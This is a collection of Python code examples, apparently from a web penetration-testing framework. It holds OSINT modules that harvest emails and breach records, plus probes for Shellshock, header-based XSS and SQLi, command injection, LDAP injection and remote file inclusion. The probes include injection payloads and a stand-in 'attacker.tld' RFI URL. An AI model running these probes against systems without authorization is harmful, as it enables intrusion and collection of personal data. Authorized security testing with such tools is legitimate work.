Example #1
def getRes0x00():
    requests = session()
    email = input(C + ' [§] Enter the email :> ' + R)
    while '@' not in email or '.' not in email:
        email = input(C + ' [§] Enter a valid email :> ' + R)

    print(GR + ' [*] Setting headers... (behaving as a browser)...')
    time.sleep(0.7)
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    print(P + ' [!] Making the no-verify request...' + C)
    time.sleep(0.5)
    url = "https://whoisology.com/search_ajax/search?action=email&value=" + email + "&page=1&section=admin"
    result = ''
    try:
        result = requests.get(url, headers=headers, verify=False,
                              timeout=10).text
        if result != '':
            regex = re.compile(r'whoisology\.com/(.*?)">')
            stuff = regex.findall(result)
            if len(stuff) > 0:
                for line in stuff:
                    if line.strip() != '':
                        if '.' in line:
                            print(O + ' [+] Received Domain :' + C +
                                  color.TR3 + C + G + line + C + color.TR2 + C)
            else:
                print(R + " [-] Empty domain result for email : " + O + email +
                      C)
    except Exception:
        print(R + " [-] Can't reach url...")
        print(R + ' [-] Request timed out!')
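
# Note: every example in this collection calls session() and then names the
# returned object "requests". The helper itself is not shown here; a minimal
# sketch of what it plausibly looks like (an assumption, not the framework's
# actual code):
import requests as _requests  # aliased so the local "requests = session()" convention still works
import urllib3

def session():
    # Return a plain requests.Session; TLS warnings are silenced up front
    # because the modules frequently request with verify=False.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    return _requests.Session()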
Example #2
def apachestat(web):
    name = targetname(web)
    requests = session()
    lvl2 = "apachestat"
    module = "ReconANDOSINT"
    lvl1 = "Active Reconnaissance"
    lvl3 = ""
    flag = 0x00
    time.sleep(0.7)

    from core.methods.print import posintact
    posintact("apache status")

    print(C + ' [*] Importing fuzz parameters...')
    time.sleep(0.7)
    print(GR + ' [*] Initializing bruteforce...')
    with open('files/fuzz-db/apachestat_paths.lst', 'r') as paths:
        for path in paths:
            path = path.replace('\n', '')
            url = web + path
            print(B + ' [+] Trying : ' + C + url)
            resp = requests.get(url,
                                allow_redirects=False,
                                verify=False,
                                timeout=7)
            if resp.status_code == 200 or resp.status_code == 302:
                print(O + ' [+] Apache Server Status Enabled at :' + C +
                      color.TR3 + C + G + url + C + color.TR2 + C)
                flag = 0x01
                save_data(database, module, lvl1, lvl2, lvl3, name, url)

    if flag == 0x00:
        save_data(database, module, lvl1, lvl2, lvl3, name,
                  "No server status enabled.")
        print(R + ' [-] No server status enabled!')

    print(C + ' [+] Apache server status completed!\n')
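
# The fuzz list consumed by apachestat() is one path per line. Its contents
# are not included in this collection; for Apache's status/info handlers one
# would expect entries along these lines (illustrative guesses, not the
# shipped files/fuzz-db/apachestat_paths.lst):
#
#   /server-status
#   /server-status/
#   /server-info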
Example #3
def subnet(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    time.sleep(0.4)
    from core.methods.print import posintpas
    posintpas("subnet enumeration")
    print(GR + ' [!] Enumerating subnets in network...')
    time.sleep(0.4)
    print(GR + ' [*] Getting subnet class infos...\n')
    domains = [web]
    for dom in domains:
        text = requests.get('http://api.hackertarget.com/subnetcalc/?q=' +
                            dom).text
        #text = requests.get('https://steakovercooked.com/api/ping/?host=' + dom).text
        http = str(text)

        if 'No results found' in http:
            print(R + ' [-] No results found!')
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No results found.")
        elif 'error' not in http:
            result = http.splitlines()
            for r in result:
                print(O + ' ' + r.split('=')[0] + C + color.TR3 + C + G + '=' +
                      r.split('=')[1] + C + color.TR2 + C)
            save_data(database, module, lvl1, lvl2, lvl3, name, http)
        else:
            print(R + ' [-] Outbound Query Exception!')
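
# Shape of the api.hackertarget.com/subnetcalc response the loop above splits
# on '=' (illustrative, not captured output):
#
#   Address = 93.184.216.34
#   Network = 93.184.216.0/24
#   Broadcast = 93.184.216.255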
Example #4
def outer(web):
    requests = session()
    global final
    final = []
    wew = []
    time.sleep(0.4)
    print(R + '\n    A P I   R E T R I E V E R  ')
    print(R + '   ---<>----<>----<---<>----<>')

    print(GR + color.BOLD + ' [!] Retrieving subdomains...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: " + color.END)
    dom = web.replace('http://', '').replace('https://', '')
    text = requests.get('http://api.hackertarget.com/hostsearch/?q=' +
                        dom).text
    result = str(text)
    if 'error' not in result:
        print(color.END + result + C)
        mopo = result.splitlines()
        for mo in mopo:
            ro = mo.split(',')[0]
            final.append(str(ro))
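
# api.hackertarget.com/hostsearch returns one "hostname,ip" pair per line,
# which is why each result line is split on ',' above. Illustrative shape:
#
#   www.example.com,93.184.216.34
#   mail.example.com,93.184.216.35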
Example #5
    def xsscookie0x00(web, parallel):

        print(R + '\n     X S S  (Cookie Based)')
        print(R + '    ——·‹›·––·‹›·——·‹›·——·‹›\n')

        sleep(0.5)
        vsession = session()
        vsession.get(web)
        if vsession.cookies:
            print(G + ' [+] This website supports session cookies...')
            success = []
            if not parallel:
                success += cookieatck(pay, vsession, web)
            else:
                paylists = listsplit(pay, round(len(pay) / processes))
                with Pool(processes=processes) as pool:
                    res = [
                        pool.apply_async(cookieatck, args=(
                            l,
                            vsession,
                            web,
                        )) for l in paylists
                    ]
                    for y in res:
                        i = y.get()
                        success += i
            if success:
                print(
                    " [+] XSS (Cookie) Vulnerability found! Successful payloads:"
                )
                for i in success:
                    print(i)
            else:
                print(R + "\n [-] No payload succeeded." + C)
        else:
            print(R + ' [-] No support for cookies...')
            time.sleep(0.5)
            print(R + ' [-] Cookie based injection not possible...')
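
# listsplit() drives the parallel branches here and in Example #28 but is not
# shown in this collection. A minimal sketch matching the observed call shape
# listsplit(items, size) (an assumption, not the framework's implementation):
def listsplit(items, size):
    # Split items into consecutive chunks of at most `size` elements.
    size = max(1, int(size))
    return [items[i:i + size] for i in range(0, len(items), size)]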
Example #6
def shellshock0x00(web):
    requests = session()
    print(GR + ' [*] Parsing strings...')
    time.sleep(0.5)
    r_str = ''.join(Random().sample(string.ascii_letters, 30))
    print(GR + ' [*] Configuring payloads...')
    con = '() { :;}; echo; echo; echo %s' % (r_str)
    cmd = "() { test;};/bin/nopatchobfu"
    headers = {'User-agent': cmd}
    time.sleep(0.5)
    print(O + ' [*] Making no-verify request...')
    time.sleep(1)
    r = requests.get(web, headers=headers, verify=False)
    if r.status_code == 500 or r.status_code == 502:
        print(G + ' [+] The website seems Vulnerable to Shellshock...')
        time.sleep(0.5)
        print(O + ' [*] Confirming the vulnerability...')

        headers = {'User-Agent': con, 'Cookie': con, 'Referer': con}

        resp = requests.get(web, headers=headers, verify=False)
        if resp.status_code == 200 and re.search(r_str, resp.text, re.I):
            print(G + ' [+] ShellShock was found in: {}'.format(resp.url))
            data = 'ShellShock was found in: {}'.format(resp.url)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            print(
                R +
                ' [-] 2nd phase of detection does not reveal vulnerability...')
            print(O + ' [!] Please check manually...')
            save_data(
                database, module, lvl1, lvl2, lvl3, name,
                "2nd phase of detection does not reveal vulnerability. Please check manually."
            )
    else:
        print(R + ' [-] The website seems immune to shellshock...')
        save_data(database, module, lvl1, lvl2, lvl3, name, "Not vulnerable.")
Example #7
def apircv(web):
    requests = session()
    try:
        domain = web.replace('http://','')
        domain = domain.replace('https://','')
        html = requests.get('http://w3techs.com/siteinfo.html?fx=y&url=' + domain).text
        soup = BeautifulSoup(html, 'lxml')
        table = soup.findAll('table', attrs={'class':'w3t_t'})[0]
        trs = table.findAll('tr')

        for tr in trs:
            th = tr.find('th')
            td = tr.find('td').text

            if td[-7:] == 'more...':
                td = td[:-9]

            print(G+' [+] '+th.text+': ')
            print(C+'      '+td+'\n')
            time.sleep(0.7)
    except:
        print(R+' [-] Outbound Query Exception!')
Example #8
def getRes0x00():
    requests = session()
    email = input(O+' [#] Enter the email :> '+R)
    while '@' not in email or '.' not in email:
        email = input(O+' [#] Enter a valid email :> '+R)

    print(GR+' [*] Setting headers... (behaving as a browser)...')
    time.sleep(0.7)
    headers =   {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
                 'Accept-Language':'en-US;',
                 'Accept-Encoding': 'gzip, deflate',
                 'Accept': 'text/html,application/xhtml+xml,application/xml;',
                 'Connection':'close'}
    print(O+' [!] Making the no-verify request...')
    time.sleep(0.5)
    url = 'https://hacked-emails.com/api?q='+str(email)

    try:
        req = requests.get(url, headers=headers, timeout=10, verify=False)
        content = req.text
        if content != "":
            content = json.loads(content)
            if content['status'] == "found":
                print("Result found ("+G+str(content['results']) + " results" + Style.RESET_ALL + ")")
                for line in content['data']:
                    try:
                        print(G+" [+] "+O+email+G+" found in : " +C+ str(line['title']) +R+" (" + str(line['date_leaked'])+')')
                    except Exception:
                        print(R+" [-] Can't parse the leak titles via API...")
            else:
                print(R+' [-] Email '+O+email+R+' not found in any breaches!')
        else:
            print(R+' [-] Empty response received from API...')

    except Exception:
        print(R+" [-] Can't reach url...")
        print(R+' [-] Request timed out!')
Example #9
def request(url, lvl2):
    name = targetname(url)
    requests = session()
    time.sleep(0.5)
    links = [url]
    po = url.split('//')[1]
    for w in links:
        print(GR+' [*] Scraping Page: '+O+url+C)
        req = requests.get(w).text
        check0x00(req, url, lvl2, name)

    soup = BeautifulSoup(req,'lxml')
    for line in soup.find_all('a', href=True):
        newline = line['href']
        try:
            if newline[:4] == "http":
                if po in newline:
                    urls.append(str(newline))
            elif newline[:1] == "/":
                combline = url+newline
                urls.append(str(combline))
        except Exception:
            print(R+' [-] Unhandled Exception Occurred!')

    try:
        for uurl in urls:
            print("\n"+O+" [+] Scraping Page: "+C+color.TR3+C+G+uurl+C+color.TR2+C)
            req = requests.get(uurl).text
            check0x00(req, url, lvl2, name)

    except Exception:
        print(R+' [-] Outbound Query Exception...')

    if found == 0x00:
        print(R+'\n [-] No Errors found in Source Code!\n')
        save_data(database, module, lvl1, lvl2, lvl3, name, "No Errors found in Source Code.")

    print(G+' [+] Scraping Done!'+C+color.TR2+C)
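
# request() leans on module-level state defined outside this snippet: `urls`
# accumulates the same-origin links to crawl and `found` is set by check0x00()
# when an error signature matches. A minimal sketch of that state (assumption):
urls = []
found = 0x00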
Example #10
def getemails0x00(domain):
    requests = session()
    global flag
    flag = False
    page_counter = 0
    try:
        while page_counter < 100:
            print(GR+' [*] Setting parameters...')
            time.sleep(0.6)
            results = 'http://www.google.com/search?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
            print(O+' [!] Making the request...')
            response = requests.get(results)
            print(GR+' [*] Extracting response...')
            text = response.text
            emails = re.findall(r'([\w\.\-]+@'+domain+')', tagparse(text))
            for email in emails:
                print(G+' [+] Received e-mail : '+O+email)
                flag = True
            page_counter = page_counter + 10
    except IOError:
        print(R+" [-] Error connecting to Google...")

    try:
        page_counter = 0
        while page_counter < 100:
            print(GR+' [*] Setting parameters...')
            time.sleep(0.6)
            results = 'http://groups.google.com/groups?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
            print(O+' [!] Making the request...')
            response = requests.get(results)
            print(GR+' [*] Extracting response...')
            text = response.text
            emails = re.findall(r'([\w\.\-]+@'+domain+')', tagparse(text))
            for email in emails:
                print(G+' [+] Received e-mail : '+O+email)
                flag = True
            page_counter = page_counter + 10
    except IOError:
        print(R+" [-] Error connecting to Google Groups...")
Example #11
def sessionfix(url):
    requests = session()

    from core.methods.print import pvln
    pvln("session fixation") 
                
    print(GR+' [*] Making the request...')
    if properties["COOKIE"][1] == " ":
        coo = input(O+' [§] Got any cookies? [Just Enter if None] :> ')
    elif properties["COOKIE"][1].lower() == "none":
        coo = ""
    else:
        coo = properties["COOKIE"][1]
    if coo != "":
        # requests expects a dict of cookies, so parse the "name=value; ..." input
        cookies = dict(c.strip().split('=', 1) for c in coo.split(';') if '=' in c)
        req = requests.get(url, cookies=cookies, verify=True, timeout=7)
    else:
        req = requests.get(url, verify=True, timeout=7)
    if req.cookies:
        print(G+' [+] Found cookie reflecting in headers...')
        print(B+' [+] Initial cookie state: '+C, req.cookies, '\n')
        user = input(O+' [§] Enter authentication username :> '+C)
        upass = input(O+' [§] Enter password :> '+C)
        print(GR+' [*] Trying POST request with authentication...')
        cookie_req = requests.post(url, cookies=req.cookies, auth=(user, upass), timeout=7)
        print(B+' [+] Authenticated cookie state:'+C, cookie_req.cookies)
        if dict(req.cookies) == dict(cookie_req.cookies):
            print(G+' [+] Site seems to be vulnerable...')
            print(G+' [+] Site is vulnerable to session fixation vulnerability!')
        else:
            print(O+' [!] Cookie values do not match...')
            print(R+' [-] Target not vulnerable to session fixation!')
    else:
        print(R+' [-] No basic cookie support!')
        print(R+' [-] Target not vulnerable to session fixation!')
    print(G+' [+] Session Fixation Module Completed!\n')
Example #12
def revdns(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.split('//')[1]
    if "@" in web:
        web = web.split("@")[1]
    from core.methods.print import posintpas
    posintpas("reverse dns lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for Reverse DNS Info...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
    text = requests.get('http://api.hackertarget.com/reversedns/?q=' + web)
    result = text.text
    if 'error' not in result and 'no result' not in result.lower():
        res = result.splitlines()
        for r in res:
            print(O + ' [+] Received :' + C + color.TR3 + C + G +
                  r.split(',')[0].strip() + ' => ' + C + '(' +
                  r.split(',')[1].strip() + ')' + C + color.TR2 + C)
            time.sleep(0.04)
            links.append(r)

        data = result
        save_data(database, module, lvl1, lvl2, lvl3, name, data)

    else:
        print(R + ' [-] No result found!')
        save_data(database, module, lvl1, lvl2, lvl3, name, "No result found.")
        time.sleep(0.8)
Example #13
def check0x00(url, pays, check):

    success = []
    requests = session()
    for params in url.split("?")[1].split("&"):
        for payload in pays:
            print(B+'\n [*] Trying payload :> '+C+str(payload))
            print(GR+' [!] Setting parameter value...')
            bugs = url.replace(params, params + str(payload).strip())
            print(O+' [*] Making the request...')
            request = requests.get(bugs)
            print(GR+' [*] Reading response...')
            html = request.text
            vuln = len(re.findall(check, html)) != 0

            if vuln:
                print(G+" [+] Possible vulnerability found!")
                print(C+" [+] Payload: ", payload)
                print(R+" [+] Example PoC: " + bugs)
                success.append(bugs)
            else:
                print(R+' [-] No command injection flaw detected!')
                print(O+' [-] Payload '+R+payload+O+' not working!')

    return success
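
# Illustrative call shape (hypothetical target, payloads and check pattern):
# every parameter in the query string is suffixed with each payload, and
# `check` is the regex proving command output leaked into the response.
#
#   success = check0x00('http://target.tld/ping?host=127.0.0.1',
#                       [';id', '|id', '&&id'], r'uid=\d+\(')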
Example #14
def userpre(pay, web):
    success = []
    requests = session()
    for i in pay:
        print(B + ' [*] Using payload : ' + C + i)
        time.sleep(0.7)
        user_agent = {
            'User-agent':
            'Mozilla/5.0 (X11; Ubuntu; Linux ' +
            'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
        }
        user_agent['User-agent'] += i
        req = requests.get(web, headers=user_agent)
        print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
              user_agent['User-agent'])
        # Joining the characters of req.text with spaces would break every
        # multi-character signature match, so keep the raw response text.
        flag = req.text
        if 'error' in flag or 'syntax' in flag or 'mysql' in flag.lower():
            print(G + '\n [!] Error based SQLi (User-Agent Based) Detected!')
            print(R + ' [!] User-Agent : ' + O + user_agent['User-agent'])
            success.append(i)
    return success
Example #15
def refatck(pays, web):
    success = []
    requests = session()
    for j in pays:
        i = str(j)
        print(B+' [*] Using payload : '+C+i)
        time.sleep(0.7)
        headers = {'Referer': 'http://' + 'xssing.pwn'}
        headers['Referer'] += i
        req = requests.get(web, headers=headers)
        print(O+' [*] Using '+R+'!nfected'+O+' Referer : '+GR+headers['Referer'])
        flag = req.text
        if i in flag:
            print(G+'\n [!] Cross Site Scripting (Referrer Based) Detected!')
            print(R+' [!] Referer : '+O+headers['Referer'])
            print(W+color.BOLD+' [+] Code: '+W)
            print(req.text+'\n')
            success.append(i)
    return success
Example #16
def blocklistssh(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'BlockLists SSH threatlist...')
    try:
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://lists.blocklist.de/lists/ssh.txt',
                            verify=False,
                            timeout=10).text
        print(C + ' [!] Parsing raw data...')
        time.sleep(0.5)
        for i in resp.splitlines():
            if ip in i:
                flag = True
        if flag:
            print(R + ' [+] ' + O + web + G +
                  ' has been reported for attacks on SSH services...')
        else:
            print(G + ' [+] ' + O + web + G + ' is clean as per BlockLists...')

    except Exception:
        print(R + ' [-] Request to BlockLists timed out!')
Example #17
def usom(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'Usom threatlist...')
    try:
        print(GR + ' [*] Making a reverse DNS query...')
        print(G + ' [+] DNS : ' + O + ip)
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://www.usom.gov.tr/url-list.txt',
                            verify=False,
                            timeout=10).text
        for i in resp.splitlines():
            if ip in i:
                flag = True
        if flag:
            print(R + ' [+] ' + O + web + G +
                  ' is harmful and has been reported on Usom...')
        else:
            print(G + ' [+] ' + O + web + G + ' is clean as per Usom...')

    except Exception:
        print(R + ' [-] Request to usom.gov.tr timed out!')
Example #18
def piwebenum(web):
    requests = session()
    time.sleep(0.4)
    web = web.split('//')[1]
    from core.methods.print import posintact
    posintact("(n)ping enumeration")
    print(GR + ' [!] Pinging website...')
    time.sleep(0.5)
    print(O + ' [*] Using adaptive ping in debug mode with count 5...')
    time.sleep(0.4)
    print(GR + ' [!] Press Ctrl+C to stop\n' + C)
    os.system('ping -A -D -c 5 ' + web)
    print('')
    time.sleep(0.6)
    print(O + ' [*] Trying NPing (NMap Ping)...')
    print(C + " [~] Result: \n")
    print('')
    text = requests.get('http://api.hackertarget.com/nping/?q=' + web).text
    nping = str(text)
    print(G + nping + '\n')
Example #19
def credit0x00(url):
    requests = session()
    print(G+' [+] Importing credit card signatures...')
    time.sleep(0.5)
    links = [url]
    po = url.split('//')[1]
    for w in links:
        print(GR+' [*] Scraping Page: '+O+url)
        req = requests.get(w).text
        check0x00(req)

    soup = BeautifulSoup(req,'lxml')
    for line in soup.find_all('a', href=True):
        newline = line['href']
        try:
            if newline[:4] == "http":
                if po in newline:
                    urls.append(str(newline))
            elif newline[:1] == "/":
                combline = url+newline
                urls.append(str(combline))
        except Exception:
            print(R+' [-] Unhandled Exception Occurred!')

    try:
        for uurl in urls:
            print(G+"\n [+] Scraping Page: "+O+uurl)
            req = requests.get(uurl).text
            check0x00(req)

    except Exception:
        print(R+' [-] Outbound Query Exception...')

    if found == 0x00:
        print(R+' [-] No Credit Cards found disclosed in plaintext in source code!')

    print(G+' [+] Scraping Done!')
Example #20
def getgeoip(web):
    name = targetname(web)
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    from core.methods.print import posintpas
    posintpas("geoip lookup")
    time.sleep(0.4)
    print(GR + ' [!] Looking Up for WhoIS Information...')
    time.sleep(0.4)
    print(GR + " [~] Found GeoIp Location: \n")
    domains = socket.gethostbyname(web)
    time.sleep(0.6)
    text = requests.get('http://api.hackertarget.com/geoip/?q=' + domains).text
    result = str(text)
    if 'error' not in result and 'invalid' not in result:
        res = result.splitlines()
        for r in res:
            print(O + ' [+] ' + r.split(':')[0].strip() + '' + C + color.TR3 +
                  C + G + r.split(':')[1].strip() + C + color.TR2 + C)
            time.sleep(0.1)

    else:
        print(R + ' [-] Outbound Query Exception!')
        time.sleep(0.8)

    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl2 = inspect.stack()[0][3]
    lvl3 = ""
    data = result
    save_data(database, module, lvl1, lvl2, lvl3, name, data)
Example #21
def revip(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    from core.methods.print import posintpas
    posintpas("reverse ip lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for Reverse IP Info...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result : \n" + color.END)
    domains = [web]
    for dom in domains:
        text = requests.get('http://api.hackertarget.com/reverseiplookup/?q=' +
                            dom).text
        result = str(text)
        res = result.splitlines()
        if 'error' not in result:
            for r in res:
                print(O + ' [+] Site :>' + C + color.TR3 + C + G + r + C +
                      color.TR2 + C)
                links.append(r)
                time.sleep(0.04)
            save_data(database, module, lvl1, lvl2, lvl3, name, result)

        else:
            print(R + ' [-] Outbound Query Exception!')
            time.sleep(0.8)
Example #22
def check0x00(alias, web):
    requests = session()
    print(GR + " [*] Searching alias " + O + alias + GR +
          " on 160 websites...\n")
    print(GR + ' [¬] Result : \n')
    headers = {'X-Requested-With': 'XMLHttpRequest'}

    for service in services:
        try:
            # NOTE: the original line here is partially redacted; the request
            # below is reconstructed from the surrounding parameters.
            url = ('http://checkusernames.com/usercheckv2.php?target=' +
                   service + '&username=' + alias)
            req = requests.get(url, headers=headers, timeout=10)
            if 'notavailable' in req.text:
                print(GR + ' [+] Found ' + O + alias + G + ' : ' + C + service)
                serv.append(service)

        except Exception as e:
            print(R + ' [-] Incurred Exception : ' + str(e))

    po = web.strip()
    if 'http://' in po:
        po = po.replace('http://', '')
    elif 'https://' in po:
        po = po.replace('https://', '')
    if "@" in po:
        po = po.split("@")[1]
    p = 'tmp/logs/' + po + '-logs/' + str(po) + '-usernames.lst'
    print(B + ' [!] Saving links...')
    time.sleep(1)
    with open(p, "w") as ile:
        for m in serv:
            ile.write('Social Network : ' + m + '\n')
    pa = os.getcwd()
    print(G + ' [+] Links saved under ' + pa + '/' + p + '!')
    print('')
Example #23
def check0x00(web000, headers, pays):
    success = []
    requests = session()
    for payload in pays:
        gotcha = False
        print(B + '\n [+] Using Payload : ' + C + payload)
        web0x00 = web000 + payload
        print(O + ' [+] Url : ' + C + web0x00)
        print(GR + ' [*] Making the request...')
        try:
            req = requests.get(web0x00,
                               headers=headers,
                               allow_redirects=False,
                               timeout=7,
                               verify=False).text
            print(O + ' [!] Searching through error database...')
            for err in ldap_errors:
                if err.lower() in req.lower():
                    print(G + ' [+] Possible LDAP Injection Found : ' + O +
                          web0x00)
                    gotcha = True
                    print(O + ' [+] Response : ')
                    print(P + req)
                    success.append(payload)

            if not gotcha:
                print(R + ' [-] No error reflection found in response!')
                time.sleep(0.4)
                print(R + ' [-] Payload ' + O + payload + R + ' not working!')

        except Exception as e:
            print(R + ' [-] Query Exception : ' + str(e))
    return success
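
# ldap_errors is referenced above but defined elsewhere in the module. A short
# illustrative list of the kind of error signatures it would hold (an
# assumption, not the framework's actual database):
ldap_errors = [
    'supplied argument is not a valid ldap',
    'javax.naming.NameNotFoundException',
    'Invalid DN syntax',
    'LDAPException',
]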
Example #24
def iphistory(web):
    requests = session()
    try:
        from core.methods.print import posintpas
        posintpas("ip history")
        print(GR+' [*] Parsing Url...')
        web0 = web.split('//')[-1]
        if "@" in web0:
            web0 = web0.split("@")[1]

        print(O+' [!] Making the request...')
        html = requests.get('http://viewdns.info/iphistory/?domain=' + web0).text
        print(GR+' [*] Parsing raw-data...')
        time.sleep(0.7)
        soup = BeautifulSoup(html,'lxml')
        print(O+' [!] Setting parameters...')
        table = soup.findAll('table', attrs={'border':'1'})[0]
        print(C+' [!] Finding IP history instances...')
        trs = table.findAll('tr')
        trs.pop(0)

        print(G+'\n [+] Following instances were found...')

        for tr in trs:
            td = tr.findAll('td')
            info = {'ip' : td[0].text, 'owner' : td[2].text.rstrip(), 'last' : td[3].text}
            print(G+' [+] Instance : ' +C+ info['ip'] +GR+ ' => ' + info['owner'] +B+ ' - (' + info['last'] + ')')
            time.sleep(0.02)

    except Exception:
        print(R+' [-] No instances of IP History found...')
Example #25
def projecthoneypot(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'Project HoneyPot threatlist...')
    try:
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://www.projecthoneypot.org/list_of_ips.php',
                            verify=False,
                            timeout=10).text
        if str(ip) in resp:
            flag = True

        if flag:
            print(
                R + ' [+] ' + O + web + G +
                ' is a harmful site and has been reported on Project HoneyPot...'
            )
        else:
            print(G + ' [+] ' + O + web + G +
                  ' is clean as per Project HoneyPot...')

    except Exception:
        print(R + ' [-] Request to projecthoneypot.org timed out!')
Example #26
def check0x00(web, dirpath, headers):
    requests = session()
    try:
        for dirs in dirpath:
            web0x00 = web + dirs
            req = requests.get(web0x00,
                               headers=headers,
                               allow_redirects=False,
                               timeout=7,
                               verify=False)
            try:
                size = int(req.headers.get('content-length') or 0)
            except (KeyError, ValueError, TypeError):
                size = len(req.content)
            finally:
                size = FileUtils.sizeHuman(size)

            resp = str(req.status_code)
            if resp in ('200', '302', '304'):
                print(G + ' [*] Found : ' + O + web0x00 + GR + ' - ' + size +
                      G + ' (' + resp + ')')
                file_paths.append(web0x00)

            else:
                print(C + ' [*] Checking : ' + B + web0x00 + R + ' (' + resp +
                      ')')
        return file_paths

    except Exception as e:
        print(R + ' [-] Unknown Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
        return file_paths
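
# FileUtils.sizeHuman() comes from elsewhere in the framework. A minimal
# sketch of a human-readable byte formatter with that call shape (an
# assumption, not the framework's implementation):
class FileUtils:
    @staticmethod
    def sizeHuman(num):
        # Format a byte count as B/KB/MB/GB.
        for unit in ['B', 'KB', 'MB']:
            if num < 1024:
                return '{:.0f}{}'.format(num, unit)
            num /= 1024.0
        return '{:.1f}GB'.format(num)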
Example #27
def brute0x00(web):
    requests = session()
    try:
        print(GR+' [*] Importing wordlist...')
        if os.path.exists('files/fuzz-db/rfi_paths.lst'):
            print(G+' [+] File path found!')
            time.sleep(0.6)
            print(O+' [*] Importing wordlist...')
            with open('files/fuzz-db/rfi_paths.lst','r') as wew:
                for w in wew:
                    w = w.strip('\n')
                    payloads.append(w)
            print(GR+' [*] Starting bruteforce...')
            time.sleep(0.7)
            for pay in payloads:
                try:
                    pay = pay.replace('XXpathXX',payload_url)
                    web0x00 = web + pay
                    req = requests.get(web0x00, allow_redirects=False, timeout=7, verify = False)
                    c = str(req.status_code)
                    if c == '200' and payload_1 in req.text and payload_2 in req.text and payload_3 in req.text:
                        print(G+' [+] Possible RFi at : '+O+web0x00+G+' (200)')
                    elif c == '404':
                        print(B+' [*] Checking dir : '+C+web0x00+R+' (404)')
                    elif c == '302':
                        print(B+' [*] Possible RFi : '+C+web0x00+GR+' (302)')
                    else:
                        print(O+' [*] Interesting response : '+GR+web0x00+O+' ('+c+')')

                except Exception:
                    print(R+' [-] Exception Encountered!')

    except Exception as e:
        print(R+' [-] Unexpected Exception Encountered!')
        print(R+' [-] Exception : '+str(e))
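
# brute0x00() depends on module-level payload state that is not part of this
# snippet. Sketch of the expected shapes (assumptions; names taken from the
# code above, values purely hypothetical): payload_url replaces XXpathXX in
# each wordlist entry, and payload_1..3 are markers the included file must
# echo back.
payloads = []
payload_url = 'http://attacker.tld/rfi_probe.txt'
payload_1, payload_2, payload_3 = 'marker-one', 'marker-two', 'marker-three'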
Example #28
    def sqliuser0x00(web, parallel):

        print(R+'\n     S Q L i  (User-Agent Based)')
        print(R+'    ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')
        success = []
        requests = session()
        if not parallel:
            for i in pay:
                print(B+' [*] Using payload : '+C+i)
                time.sleep(0.7)
                user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux ' +
                            'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
                user_agent['User-agent'] += i
                req = requests.get(web, headers=user_agent)
                print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
                flag = req.text
                if 'error' in flag or 'syntax' in flag or 'mysql' in flag.lower():
                    print(G+'\n [!] Error based SQLi (User-Agent Based) Detected!')
                    print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
                    success.append(i)
        else:
            paylists = listsplit(pay, round(len(pay)/processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(userpre, args=(l,web,)) for l in paylists]
                for i in res:
                    j = i.get()
                    success += j
        if success:
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded."+C)
Example #29
 def do_fetch(self, inp, gui=False):
     try:
         localver = varis.e_version.split("#")[0]
         s = session()
         onver = s.get("https://raw.githubusercontent.com/VainlyStrain/Vaile/master/core/doc/version").text.strip()
         localmain = localver.split("-")[0]
         localrev = localver.split("-")[1]
         locallist = localmain.split(".")
         onmain = onver.split("-")[0]
         onrev = onver.split("-")[1]
         onlist = onmain.split(".")
         uptodate = True
         for i in range(0, len(locallist)):
             if int(locallist[i]) < int(onlist[i]):
                 uptodate = False
         if uptodate:
             if int(localrev) < int(onrev):
                 uptodate = False
         if not uptodate:
             print(" [!] An update is available! Last version is: {}, installed version is: {}.".format(onver, localver))
             if not gui:
                 d = input(" [?] Do you want to update the framework? (enter if not) :> ")
